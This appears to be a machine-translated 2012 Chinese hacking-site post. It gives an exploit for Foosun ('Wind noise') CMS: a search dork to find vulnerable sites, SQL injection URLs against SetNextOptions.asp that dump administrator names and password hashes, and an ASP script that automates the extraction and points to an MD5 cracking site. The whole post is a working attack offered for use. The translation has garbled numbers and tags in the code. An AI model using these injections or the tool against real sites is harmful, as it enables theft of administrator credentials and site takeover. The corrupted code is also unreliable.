Wind noise CMS 0DAY exploits-exploits warning-the black bar safety net

2012-01-06T00:00:00
ID MYHACK58:62201232824
Type myhack58
Reporter 佚名
Modified 2012-01-06T00:00:00

Description

Keywords: inurl:User/Reg_service. asp

The wind noise the registration page...

Vulnerability page:/user/SetNextOptions. asp

Use method:

Constructor injection

user/SetNextOptions. asp? sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin

“admin_name”admin user name of the database table

user/SetNextOptions. asp? sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin

“admin_pass_word”manage password database table

Put the following code into an ASP file and then in the local frame of an ASP environment it is OK.

DE><herd><title>foosun cms 0day exploits</title></herd><body><%web=request("web")id=request("id")%>keywords:member registration step 1 of 4 step<br><form action=" method=post>enter the address:< input type=text size=5 0 id=web name=web value="<%=web%>"><br>to storm ID number(default is 1)<input type=text size=3 name=id value="<%=id%>">ID 1 is the super administrator<br><input type=submit value="I'm going to storm"></form><form><% function bin2str(bin) dim tmp,ustr tmp="" for i=1 to LenB(bin)-1 ustr=AscB(MidB(bin,i,1)) if ustr>1 2 7 then i=i+1 tmp=tmp&chr(ustr*2 5 6+AscB(MidB(bin,i,1))) else tmp=tmp&chr(ustr) end if next bin2str=tmp end functionwebuser=web&"User/setnextoptions. asp? EquValue=1&ReqSql=select%2 0 1,ADMIN_name,3,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1,2 2,2 3,2 4,2 5,2 6,2 7,2 8,2 9,3 0,3 1,3 2,3 3,3 4,3 5,3 6,3 7,3 8,3 9,4 0,4 1,4 2,4 3,4 4,4 5,4 6,4 7,4 8,4 9,5 0,5 1%20from%20FS_MF_ADMIN%20where% 20id="&amp; idwebpass=web&"User/setnextoptions. asp? EquValue=1&ReqSql=select%2 0 1,ADMIN_pass_word,3,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1,2 2,2 3,2 4,2 5,2 6,2 7,2 8,2 9,3 0,3 1,3 2,3 3,3 4,3 5,3 6,3 7,3 8,3 9,4 0,4 1,4 2,4 3,4 4,4 5,4 6,4 7,4 8,4 9,5 0,5 1%20from%20FS_MF_ADMIN%20where% 20id="&amp; idif web="" thenelseset x=server. createObject("Microsoft. XMLHTTP") x. open "get",webuser,false x. send str=bin2str(x. responseBody)response. write "you storm website address:"&amp; web&"<br><br>"&id&"bits of the admin<br>"response. write "<br><a href='"&amp; web&"/Admin/login. asp' target=""_blank"">website background address</a><br>"for i=1 to 2 6 to len(str)mid1=mid1&mid(str,i,1)nextresponse. write "<br>------------------<br>account:"&mid1&"<br>"x. open "get",webpass,false x. send str=bin2str(x. responseBody)for i=1 to 2 6 to len(str)mid2=mid2&mid(str,i,1)next response. write "<br>password:"&amp; mid2&"<br>------------------<br>" response. write "<br>broke slightly, can YY.<br><br><a href='http://www.cmd5.com' target=""_blank"">cmd5</a>" set x=nothingend if%>DE>

The specific use of the method please refer to the source code.